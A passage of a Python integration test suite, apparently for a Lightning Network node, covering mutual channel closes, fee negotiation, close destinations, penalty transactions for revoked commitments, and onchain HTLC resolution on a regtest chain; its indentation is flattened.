l2.daemon.wait_for_log(r'Owning output.* \(SEGWIT\).* txid %s.* CONFIRMED' % closetxid)
# Make sure both nodes have grabbed their close tx funds
assert closetxid in set([o['txid'] for o in l1.rpc.listfunds()['outputs']])
assert closetxid in set([o['txid'] for o in l2.rpc.listfunds()['outputs']])
wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status'] == [
'CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of {} satoshi for tx:{}'.format(fee, closetxid),
'ONCHAIN:Tracking mutual close transaction',
'ONCHAIN:All outputs resolved: waiting 99 more blocks before forgetting channel'
])
bitcoind.generate_block(9)
wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status'] == [
'CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of {} satoshi for tx:{}'.format(fee, closetxid),
'ONCHAIN:Tracking mutual close transaction',
'ONCHAIN:All outputs resolved: waiting 90 more blocks before forgetting channel'
])
# Make sure both have forgotten about it
bitcoind.generate_block(90)
wait_for(lambda: len(l1.rpc.listchannels()['channels']) == 0)
wait_for(lambda: len(l2.rpc.listchannels()['channels']) == 0)
# The entry in the channels table should still be there
assert l1.db_query("SELECT count(*) as c FROM channels;")[0]['c'] == 1
assert l2.db_query("SELECT count(*) as c FROM channels;")[0]['c'] == 1
def test_closing_while_disconnected(node_factory, bitcoind, executor):
l1, l2 = node_factory.line_graph(2, opts={'may_reconnect': True})
chan = l1.get_channel_scid(l2)
l1.pay(l2, 200000000)
l2.stop()
# The close should still be triggered afterwards.
fut = executor.submit(l1.rpc.close, chan, 0)
l1.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l2.start()
fut.result(TIMEOUT)
l1.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
l2.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
# And should put closing into mempool.
l1.daemon.wait_for_log('sendrawtx exit 0')
l2.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(101)
wait_for(lambda: len(l1.rpc.listchannels()['channels']) == 0)
wait_for(lambda: len(l2.rpc.listchannels()['channels']) == 0)
def test_closing_id(node_factory):
"""Test closing using peer ID and full channel ID
"""
l1, l2 = node_factory.get_nodes(2)
# Close by full channel ID.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
cid = l2.rpc.listpeers()['peers'][0]['channels'][0]['channel_id']
l2.rpc.close(cid)
wait_for(lambda: not only_one(l1.rpc.listpeers(l2.info['id'])['peers'])['connected'])
wait_for(lambda: not only_one(l2.rpc.listpeers(l1.info['id'])['peers'])['connected'])
# Close by peer ID.
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l1.daemon.wait_for_log("Handed peer, entering loop")
l2.fund_channel(l1, 10**6)
pid = l1.info['id']
l2.rpc.close(pid)
wait_for(lambda: not only_one(l1.rpc.listpeers(l2.info['id'])['peers'])['connected'])
wait_for(lambda: not only_one(l2.rpc.listpeers(l1.info['id'])['peers'])['connected'])
@unittest.skipIf(VALGRIND, "Flaky under valgrind")
def test_closing_torture(node_factory, executor, bitcoind):
# We set up a fully-connected mesh of N nodes, then try
# closing them all at once.
amount = 10**6
num_nodes = 10 # => 45 channels (36 seconds on my laptop)
if VALGRIND:
num_nodes -= 4 # => 15 (135 seconds)
if SLOW_MACHINE:
num_nodes -= 1 # => 36/10 (37/95 seconds)
nodes = node_factory.get_nodes(num_nodes)
# Make sure bitcoind has plenty of utxos
bitcoind.generate_block(num_nodes)
# Give them all plenty of UTXOs, make sure they see them
for i in range(len(nodes)):
for j in range(i + 1, len(nodes)):
addr = nodes[i].rpc.newaddr()['bech32']
bitcoind.rpc.sendtoaddress(addr, (amount + 1000000) / 10**8)
bitcoind.generate_block(1)
sync_blockheight(bitcoind, nodes)
txs = []
for i in range(len(nodes)):
for j in range(i + 1, len(nodes)):
nodes[i].rpc.connect(nodes[j].info['id'], 'localhost', nodes[j].port)
txs.append(nodes[i].rpc.fundchannel(nodes[j].info['id'], amount)['txid'])
# Make sure they're all in, then lock them in.
bitcoind.generate_block(1, wait_for_mempool=txs)
# Wait for them all to be CHANNELD_NORMAL
for n in nodes:
wait_for(lambda: all(p['channels'][0]['state'] == 'CHANNELD_NORMAL' for p in n.rpc.listpeers()['peers']))
# Start closers: can take a long time under valgrind!
futures = []
for i in range(len(nodes)):
for j in range(i + 1, len(nodes)):
futures.append(executor.submit(nodes[i].rpc.close, nodes[j].info['id']))
futures.append(executor.submit(nodes[j].rpc.close, nodes[i].info['id']))
# Wait for close to finish
close_txs = set()
for f in futures:
# If one side completes closing, we'll get an error here 'Peer has no active channel'
try:
close_txs.add(f.result(TIMEOUT)['txid'])
except RpcError as err:
assert err.error['message'] == 'Peer has no active channel'
# Should have one close for each open.
assert len(close_txs) == len(txs)
# Get closes confirmed
bitcoind.generate_block(100, wait_for_mempool=list(close_txs))
# And make sure they hangup.
for n in nodes:
wait_for(lambda: n.rpc.listpeers()['peers'] == [])
@unittest.skipIf(SLOW_MACHINE and VALGRIND, "slow test")
def test_closing_different_fees(node_factory, bitcoind, executor):
l1 = node_factory.get_node()
# Default feerate = 15000/7500/1000
# It will start at the second number, accepting anything above the first.
feerates = [[20000, 15000, 7400], [8000, 1001, 100]]
amounts = [0, 545999, 546000]
num_peers = len(feerates) * len(amounts)
addr = l1.rpc.newaddr()['bech32']
bitcoind.rpc.sendtoaddress(addr, 1)
numfunds = len(l1.rpc.listfunds()['outputs'])
bitcoind.generate_block(1)
wait_for(lambda: len(l1.rpc.listfunds()['outputs']) > numfunds)
# Create them in a batch, for speed!
peers = []
for feerate in feerates:
for amount in amounts:
p = node_factory.get_node(feerates=feerate)
p.feerate = feerate
p.amount = amount
l1.rpc.connect(p.info['id'], 'localhost', p.port)
peers.append(p)
for p in peers:
p.channel = l1.rpc.fundchannel(p.info['id'], 10**6, minconf=0)['channel_id']
# Technically, this is async to fundchannel returning.
l1.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(6)
# Now wait for them all to hit normal state, do payments
l1.daemon.wait_for_logs(['update for channel .* now ACTIVE'] * num_peers
+ ['to CHANNELD_NORMAL'] * num_peers)
for p in peers:
if p.amount != 0:
l1.pay(p, 100000000)
# Now close all channels (not unilaterally!)
closes = [executor.submit(l1.rpc.close, p.channel, 0) for p in peers]
for c in closes:
c.result(90)
# close does *not* wait for the sendrawtransaction, so do that!
# Note that since they disagree on the ideal fee, they may conflict
# (first one in will win), so we cannot look at logs, we need to
# wait for mempool.
wait_for(lambda: bitcoind.rpc.getmempoolinfo()['size'] == num_peers)
bitcoind.generate_block(1)
for p in peers:
p.daemon.wait_for_log(' to ONCHAIN')
wait_for(lambda: 'ONCHAIN:Tracking mutual close transaction' in only_one(p.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status'])
l1.daemon.wait_for_logs([' to ONCHAIN'] * num_peers)
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_closing_negotiation_reconnect(node_factory, bitcoind):
disconnects = ['-WIRE_CLOSING_SIGNED',
'@WIRE_CLOSING_SIGNED',
'+WIRE_CLOSING_SIGNED']
l1 = node_factory.get_node(disconnect=disconnects, may_reconnect=True)
l2 = node_factory.get_node(may_reconnect=True)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
chan = l1.fund_channel(l2, 10**6)
l1.pay(l2, 200000000)
assert bitcoind.rpc.getmempoolinfo()['size'] == 0
l1.rpc.close(chan)
l1.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l2.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l1.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
l2.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
# And should put closing into mempool (happens async, so
# CLOSINGD_COMPLETE may come first).
l1.daemon.wait_for_logs(['sendrawtx exit 0', ' to CLOSINGD_COMPLETE'])
l2.daemon.wait_for_logs(['sendrawtx exit 0', ' to CLOSINGD_COMPLETE'])
assert bitcoind.rpc.getmempoolinfo()['size'] == 1
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_closing_specified_destination(node_factory, bitcoind, chainparams):
l1, l2, l3, l4 = node_factory.get_nodes(4)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.connect(l3.info['id'], 'localhost', l3.port)
l1.rpc.connect(l4.info['id'], 'localhost', l4.port)
chan12 = l1.fund_channel(l2, 10**6)
chan13 = l1.fund_channel(l3, 10**6)
chan14 = l1.fund_channel(l4, 10**6)
l1.pay(l2, 100000000)
l1.pay(l3, 100000000)
l1.pay(l4, 100000000)
bitcoind.generate_block(5)
addr = chainparams['example_addr']
l1.rpc.close(chan12, None, addr)
l1.rpc.call('close', {'id': chan13, 'destination': addr})
l1.rpc.call('close', [chan14, None, addr])
l1.daemon.wait_for_logs([' to CLOSINGD_SIGEXCHANGE'] * 3)
# Both nodes should have disabled the channel in their view
wait_for(lambda: len(l1.getactivechannels()) == 0)
assert bitcoind.rpc.getmempoolinfo()['size'] == 3
# Now grab the close transaction
closetxs = {}
for i, n in enumerate([l2, l3, l4]):
billboard = only_one(l1.rpc.listpeers(n.info['id'])['peers'][0]['channels'])['status'][0]
m = re.search(r'CLOSINGD_SIGEXCHANGE.* tx:([a-f0-9]{64})', billboard)
closetxs[n] = m.group(1)
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l1, l2, l3, l4])
# l1 can't spent the output to addr.
for txid in closetxs.values():
assert not l1.daemon.is_in_log(r'Owning output.* \(SEGWIT\).* txid {}.* CONFIRMED'.format(txid))
# Check the txid has at least 1 confirmation
for n, txid in closetxs.items():
n.daemon.wait_for_log(r'Owning output.* \(SEGWIT\).* txid {}.* CONFIRMED'.format(txid))
for n in [l2, l3, l4]:
# Make sure both nodes have grabbed their close tx funds
closetx = closetxs[n]
outputs = n.rpc.listfunds()['outputs']
assert closetx in set([o['txid'] for o in outputs])
output_num2 = [o for o in outputs if o['txid'] == closetx][0]['output']
output_num1 = 0 if output_num2 == 1 else 1
# Check the another address is addr
assert addr == bitcoind.rpc.gettxout(closetx, output_num1)['scriptPubKey']['addresses'][0]
assert 1 == bitcoind.rpc.gettxout(closetx, output_num1)['confirmations']
@unittest.skipIf(not COMPAT, "needs COMPAT=1")
def test_deprecated_closing_compat(node_factory, bitcoind, chainparams):
""" The old-style close command is:
close {id} {force} {timeout}
"""
l1, l2 = node_factory.get_nodes(2, opts=[{'allow-deprecated-apis': True}, {}])
addr = chainparams['example_addr']
nodeid = l2.info['id']
l1.rpc.check(command_to_check='close', id=nodeid)
# New-style
l1.rpc.check(command_to_check='close', id=nodeid, unilateraltimeout=10, destination=addr)
l1.rpc.check(command_to_check='close', id=nodeid, unilateraltimeout=0)
l1.rpc.check(command_to_check='close', id=nodeid, destination=addr)
# Old-style
l1.rpc.check(command_to_check='close', id=nodeid, force=False)
l1.rpc.check(command_to_check='close', id=nodeid, force=False, timeout=10)
l1.rpc.check(command_to_check='close', id=nodeid, timeout=10)
l1.rpc.call('check', ['close', nodeid])
# Array(new-style)
l1.rpc.call('check', ['close', nodeid, 10])
l1.rpc.call('check', ['close', nodeid, 0, addr])
l1.rpc.call('check', ['close', nodeid, None, addr])
# Array(old-style)
l1.rpc.call('check', ['close', nodeid, True, 10])
l1.rpc.call('check', ['close', nodeid, False])
l1.rpc.call('check', ['close', nodeid, None, 10])
# Not new-style nor old-style
with pytest.raises(RpcError, match=r'Expected unilerataltimeout to be a number'):
l1.rpc.call('check', ['close', nodeid, "Given enough eyeballs, all bugs are shallow."])
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_penalty_inhtlc(node_factory, bitcoind, executor, chainparams):
"""Test penalty transaction with an incoming HTLC"""
# We suppress each one after first commit; HTLC gets added not fulfilled.
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED-nocommit'], may_fail=True, feerates=(7500, 7500, 7500), allow_broken_log=True)
l2 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED-nocommit'])
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
# Now, this will get stuck due to l1 commit being disabled..
t = executor.submit(l1.pay, l2, 100000000)
assert len(l1.getactivechannels()) == 2
assert len(l2.getactivechannels()) == 2
# They should both have commitments blocked now.
l1.daemon.wait_for_log('=WIRE_COMMITMENT_SIGNED-nocommit')
l2.daemon.wait_for_log('=WIRE_COMMITMENT_SIGNED-nocommit')
# Make sure l1 got l2's commitment to the HTLC, and sent to master.
l1.daemon.wait_for_log('got commitsig')
# Take our snapshot.
tx = l1.rpc.dev_sign_last_tx(l2.info['id'])['tx']
# Let them continue
l1.rpc.dev_reenable_commit(l2.info['id'])
l2.rpc.dev_reenable_commit(l1.info['id'])
# Should fulfill.
l1.daemon.wait_for_log('peer_in WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_out WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Payment should now complete.
t.result(timeout=10)
# Now we really mess things up!
bitcoind.rpc.sendrawtransaction(tx)
bitcoind.generate_block(1)
l2.daemon.wait_for_log(' to ONCHAIN')
# FIXME: l1 should try to stumble along!
wait_for(lambda: len(l2.getactivechannels()) == 0)
# l2 should spend all of the outputs (except to-us).
# Could happen in any order, depending on commitment tx.
needle = l2.daemon.logsearch_start
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/DELAYED_OUTPUT_TO_THEM')
l2.daemon.logsearch_start = needle
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/THEIR_HTLC')
# FIXME: test HTLC tx race!
# 100 blocks later, all resolved.
bitcoind.generate_block(100)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
outputs = l2.rpc.listfunds()['outputs']
assert [o['status'] for o in outputs] == ['confirmed'] * 2
# Allow some lossage for fees.
slack = 27000 if chainparams['elements'] else 15000
assert sum(o['value'] for o in outputs) < 10**6
assert sum(o['value'] for o in outputs) > 10**6 - slack
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_penalty_outhtlc(node_factory, bitcoind, executor, chainparams):
"""Test penalty transaction with an outgoing HTLC"""
# First we need to get funds to l2, so suppress after second.
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED*3-nocommit'], may_fail=True, feerates=(7500, 7500, 7500), allow_broken_log=True)
l2 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED*3-nocommit'])
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
# Move some across to l2.
l1.pay(l2, 200000000)
assert not l1.daemon.is_in_log('=WIRE_COMMITMENT_SIGNED')
assert not l2.daemon.is_in_log('=WIRE_COMMITMENT_SIGNED')
# Now, this will get stuck due to l1 commit being disabled..
t = executor.submit(l2.pay, l1, 100000000)
# Make sure we get signature from them.
l1.daemon.wait_for_log('peer_in WIRE_UPDATE_ADD_HTLC')
l1.daemon.wait_for_log('peer_in WIRE_COMMITMENT_SIGNED')
# They should both have commitments blocked now.
l1.daemon.wait_for_log('dev_disconnect: =WIRE_COMMITMENT_SIGNED')
l2.daemon.wait_for_log('dev_disconnect: =WIRE_COMMITMENT_SIGNED')
# Make sure both sides got revoke_and_ack for that commitment.
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Take our snapshot.
tx = l1.rpc.dev_sign_last_tx(l2.info['id'])['tx']
# Let them continue
l1.rpc.dev_reenable_commit(l2.info['id'])
l2.rpc.dev_reenable_commit(l1.info['id'])
# Thread should complete.
t.result(timeout=10)
# Make sure both sides got revoke_and_ack for final.
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Now we really mess things up!
bitcoind.rpc.sendrawtransaction(tx)
bitcoind.generate_block(1)
l2.daemon.wait_for_log(' to ONCHAIN')
# FIXME: l1 should try to stumble along!
# l2 should spend all of the outputs (except to-us).
# Could happen in any order, depending on commitment tx.
needle = l2.daemon.logsearch_start
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/DELAYED_OUTPUT_TO_THEM')
l2.daemon.logsearch_start = needle
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/OUR_HTLC')
l2.daemon.logsearch_start = needle
l2.daemon.wait_for_log('Ignoring output.*: THEIR_REVOKED_UNILATERAL/OUTPUT_TO_US')
# FIXME: test HTLC tx race!
# 100 blocks later, all resolved.
bitcoind.generate_block(100)
wait_for(lambda: len(l2.rpc.listpeers()['peers']) == 0)
outputs = l2.rpc.listfunds()['outputs']
assert [o['status'] for o in outputs] == ['confirmed'] * 3
# Allow some lossage for fees.
slack = 27000 if chainparams['elements'] else 15000
assert sum(o['value'] for o in outputs) < 10**6
assert sum(o['value'] for o in outputs) > 10**6 - slack
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_first_commit(node_factory, bitcoind):
"""Onchain handling where funder immediately drops to chain"""
# HTLC 1->2, 1 fails just after funding.
disconnects = ['+WIRE_FUNDING_LOCKED', 'permfail']
l1 = node_factory.get_node(disconnect=disconnects)
# Make locktime different, as we once had them reversed!
l2 = node_factory.get_node(options={'watchtime-blocks': 10})
l1.fundwallet(10**7)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.fundchannel(l2.info['id'], 10**6)
l1.daemon.wait_for_log('sendrawtx exit 0')
l1.bitcoin.generate_block(1)
# l1 will drop to chain.
l1.daemon.wait_for_log('permfail')
l1.daemon.wait_for_log('sendrawtx exit 0')
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# 10 later, l1 should collect its to-self payment.
bitcoind.generate_block(10)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# 94 later, l2 is done.
bitcoind.generate_block(94)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Now, 100 blocks and l1 should be done.
bitcoind.generate_block(6)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_unwatch(node_factory, bitcoind):
"""Onchaind should not watch random spends"""
l1, l2 = node_factory.line_graph(2)
l1.pay(l2, 200000000)
l1.rpc.dev_fail(l2.info['id'])
l1.daemon.wait_for_log('Failing due to dev-fail command')
l1.wait_for_channel_onchain(l2.info['id'])
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# 10 later, l1 should collect its to-self payment.
bitcoind.generate_block(10)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# First time it sees it, onchaind cares.
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Resolved OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by our proposal '
'OUR_DELAYED_RETURN_TO_WALLET')
# Now test unrelated onchain churn.
# Daemon gets told about wallet; says it doesn't care.
l1.rpc.withdraw(l1.rpc.newaddr()['bech32'], 'all')
bitcoind.generate_block(1)
l1.daemon.wait_for_log("but we don't care")
# And lightningd should respect that!
assert not l1.daemon.is_in_log("Can't unwatch txid")
# So these should not generate further messages
for i in range(5):
l1.rpc.withdraw(l1.rpc.newaddr()['bech32'], 'all')
bitcoind.generate_block(1)
# Make sure it digests the block
sync_blockheight(bitcoind, [l1])
# We won't see this again.
assert not l1.daemon.is_in_log("but we don't care",
start=l1.daemon.logsearch_start)
# Note: for this test we leave onchaind running, so we can detect
# any leaks!
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchaind_replay(node_factory, bitcoind):
disconnects = ['+WIRE_REVOKE_AND_ACK', 'permfail']
options = {'watchtime-blocks': 201, 'cltv-delta': 101}
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options=options, disconnect=disconnects, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node(options=options)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
rhash = l2.rpc.invoice(10**8, 'onchaind_replay', 'desc')['payment_hash']
routestep = {
'msatoshi': 10**8 - 1,
'id': l2.info['id'],
'delay': 101,
'channel': '1x1x1'
}
l1.rpc.sendpay([routestep], rhash)
l1.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(1)
# Wait for nodes to notice the failure, this seach needle is after the
# DB commit so we're sure the tx entries in onchaindtxs have been added
l1.daemon.wait_for_log("Deleting channel .* due to the funding outpoint being spent")
l2.daemon.wait_for_log("Deleting channel .* due to the funding outpoint being spent")
# We should at least have the init tx now
assert len(l1.db_query("SELECT * FROM channeltxs;")) > 0
assert len(l2.db_query("SELECT * FROM channeltxs;")) > 0
# Generate some blocks so we restart the onchaind from DB (we rescan
# last_height - 100)
bitcoind.generate_block(100)
sync_blockheight(bitcoind, [l1, l2])
# l1 should still have a running onchaind
assert len(l1.db_query("SELECT * FROM channeltxs;")) > 0
l2.rpc.stop()
l1.restart()
# Can't wait for it, it's after the "Server started" wait in restart()
assert l1.daemon.is_in_log(r'Restarting onchaind for channel')
# l1 should still notice that the funding was spent and that we should react to it
l1.daemon.wait_for_log("Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET")
sync_blockheight(bitcoind, [l1])
bitcoind.generate_block(10)
sync_blockheight(bitcoind, [l1])
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_dust_out(node_factory, bitcoind, executor):
"""Onchain handling of outgoing dust htlcs (they should fail)"""
# HTLC 1->2, 1 fails after it's irrevocably committed
disconnects = ['@WIRE_REVOKE_AND_ACK', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(disconnect=disconnects, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
# Must be dust!
rhash = l2.rpc.invoice(1, 'onchain_dust_out', 'desc')['payment_hash']
routestep = {
'msatoshi': 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
l1.rpc.sendpay([routestep], rhash)
payfuture = executor.submit(l1.rpc.waitsendpay, rhash)
# l1 will drop to chain.
l1.daemon.wait_for_log('permfail')
l1.wait_for_channel_onchain(l2.info['id'])
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# We use 3 blocks for "reasonable depth"
bitcoind.generate_block(3)
# It should fail.
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE: missing in commitment tx'):
payfuture.result(5)
# Retry payment, this should fail (and, as a side-effect, tickle a
# bug).
with pytest.raises(RpcError, match=r'WIRE_UNKNOWN_NEXT_PEER'):
l1.rpc.sendpay([routestep], rhash)
# 6 later, l1 should collect its to-self payment.
bitcoind.generate_block(6)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# 94 later, l2 is done.
bitcoind.generate_block(94)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Restart l1, it should not crash!
l1.restart()
# Now, 100 blocks and l1 should be done.
bitcoind.generate_block(6)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
# Payment failed, BTW
assert only_one(l2.rpc.listinvoices('onchain_dust_out')['invoices'])['status'] == 'unpaid'
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_timeout(node_factory, bitcoind, executor):
"""Onchain handling of outgoing failed htlcs"""
# HTLC 1->2, 1 fails just after it's irrevocably committed
disconnects = ['+WIRE_REVOKE_AND_ACK*3', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(disconnect=disconnects, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
rhash = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')['payment_hash']
# We underpay, so it fails.
routestep = {
'msatoshi': 10**8 - 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
l1.rpc.sendpay([routestep], rhash)
with pytest.raises(RpcError):
l1.rpc.waitsendpay(rhash)
# Make sure CLTVs are different, in case it confuses onchaind.
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l1])
# Second one will cause drop to chain.
l1.rpc.sendpay([routestep], rhash)
payfuture = executor.submit(l1.rpc.waitsendpay, rhash)
# l1 will drop to chain.
l1.daemon.wait_for_log('permfail')
l1.wait_for_channel_onchain(l2.info['id'])
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Wait for timeout.
l1.daemon.wait_for_logs(['Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks',
'Propose handling OUR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TX .* after 6 blocks'])
bitcoind.generate_block(4)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
bitcoind.generate_block(1)
l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
# We use 3 blocks for "reasonable depth"
bitcoind.generate_block(3)
# It should fail.
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE: timed out'):
payfuture.result(5)
# 2 later, l1 spends HTLC (5 blocks total).
bitcoind.generate_block(2)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
# 89 later, l2 is done.
bitcoind.generate_block(89)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Now, 100 blocks and l1 should be done.
bitcoind.generate_block(10)
sync_blockheight(bitcoind, [l1])
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
# Payment failed, BTW
assert only_one(l2.rpc.listinvoices('onchain_timeout')['invoices'])['status'] == 'unpaid'
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_middleman(node_factory, bitcoind):
# HTLC 1->2->3, 1->2 goes down after 2 gets preimage from 3.
disconnects = ['-WIRE_UPDATE_FULFILL_HTLC', 'permfail']
l1 = node_factory.get_node()
l2 = node_factory.get_node(disconnect=disconnects)
l3 = node_factory.get_node()
# l2 connects to both, so l1 can't reconnect and thus l2 drops to chain
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
l2.fund_channel(l1, 10**6)
c23 = l2.fund_channel(l3, 10**6)
# Make sure routes finalized.
bitcoind.generate_block(5)
l1.wait_channel_active(c23)
# Give l1 some money to play with.
l2.pay(l1, 2 * 10**8)
# Must be bigger than dust!
rhash = l3.rpc.invoice(10**8, 'middleman', 'desc')['payment_hash']
route = l1.rpc.getroute(l3.info['id'], 10**8, 1)["route"]
assert len(route) == 2
q = queue.Queue()
def try_pay():
try:
l1.rpc.sendpay(route, rhash)
l1.rpc.waitsendpay(rhash)
q.put(None)
except Exception as err:
q.put(err)
t = threading.Thread(target=try_pay)
t.daemon = True
t.start()
# l2 will drop to chain.
l2.daemon.wait_for_log('sendrawtx exit 0')
l1.bitcoin.generate_block(1)
l2.daemon.wait_for_log(' to ONCHAIN')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('OUR_UNILATERAL/THEIR_HTLC')
# l2 should fulfill HTLC onchain, and spend to-us (any order)
l2.wait_for_onchaind_broadcast('OUR_HTLC_SUCCESS_TX',
'OUR_UNILATERAL/THEIR_HTLC')
# Payment should succeed.
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log('THEIR_UNILATERAL/OUR_HTLC gave us preimage')
err = q.get(timeout=10)
if err:
print("Got err from sendpay thread")
raise err
t.join(timeout=1)
assert not t.is_alive()
# Three more, l2 can spend to-us.
bitcoind.generate_block(3)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# One more block, HTLC tx is now spendable.
l1.bitcoin.generate_block(1)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US')
# 100 blocks after last spend, l2 should be done.
l1.bitcoin.generate_block(100)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_feechange(node_factory, bitcoind, executor):
"""Onchain handling when we restart with different fees"""
